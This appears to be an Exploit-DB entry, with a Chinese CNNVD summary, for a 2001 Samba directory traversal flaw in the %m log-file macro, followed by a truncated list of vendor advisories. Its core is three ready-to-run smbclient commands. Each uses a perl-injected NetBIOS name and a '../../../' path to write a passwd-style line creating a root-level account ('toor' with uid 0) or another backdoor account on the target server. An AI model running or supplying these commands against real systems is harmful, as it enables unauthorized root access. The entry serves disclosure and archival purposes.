https://www.exploit-db.com/exploits/20968
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-117

Samba2.2.0a之前版本的smb.conf配置文件的%mmacro存在目录遍历漏洞。远程攻击者可以借助用于.log文件名称的NETBIOS中的..覆盖某些文件。

source: http://www.securityfocus.com/bid/2928/info

Samba is a freely available file and printer sharing application maintained and developed by the Samba Development Team. Samba allows file and printer sharing between operating systems on the Unix and Microsoft platforms.

A remote local user can write arbitrary files on the Samba server, as the smb daemon does not sufficiently check NetBIOS name input. It is possible to overwrite files on the Samba server, and if a user has local access, potentially gain elevated privileges.

This problem makes it possible for a remote user to deny service to legitimate users, and a local user to potentially gain elevated privileges. 

smbclient //NIMUE/"`perl -e '{print "ntoor::0:0::/:/bin/shn"}'`" -n ../../../tmp/x -N

From zhhsun <[email protected]>

smbclient //NIMUE/"`perl -e '{print "nopendoor::511:511::/:/bin/shn"}'`" -n ../../../tmp/x -N -I 192.168.12.13

and also

smbclient //NIMUE/"`perl -e '{print "ntoor::0:0::/:/bin/shn"}'`" -n ../../../tmp/x -N -I 192.168.12.13

Yugo Yugos <[email protected]> provided an exploit script. It is available at http://www.securityfocus.com/data/vulnerabilities/exploits/samba-exp.sh

来源:XF
名称:samba-netbios-file-creation(6731)
链接:http://xforce.iss.net/static/6731.php
来源:BID
名称:2928
链接:http://www.securityfocus.com/bid/2928
来源:BUGTRAQ
名称:20010623smbdremotefilecreationvulnerability
链接:http://www.securityfocus.com/archive/1/193027
来源:us1.samba.org
链接:http://us1.samba.org/samba/whatsnew/macroexploit.html
来源:HP
名称:HPSBUX0107-157
链接:http://www.securityfocus.com/advisories/3423
来源:REDHAT
名称:RHSA-2001:086
链接:http://www.redhat.com/support/errata/RHSA-2001-086.html
来源:MANDRAKE
名称:MDKSA-2001-062
链接:http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-062.php3
来源:DEBIAN
名称:DSA-065
链接:http://www.debian.org/security/2001/dsa-065
来源:CALDERA
名称:CSSA-2001-024.0
链接:http://www.calderasystems.com/support/security/advisories/CSSA-2001-024.0.txt
来源:IMMUNIX
名称:IMNX-2001-70-027-01
链接:http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-027-01
来源:CONECTIVA
名称:CLA-2001:405
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000405
来源:CIAC
名称:L-105
链接:http://ciac.llnl.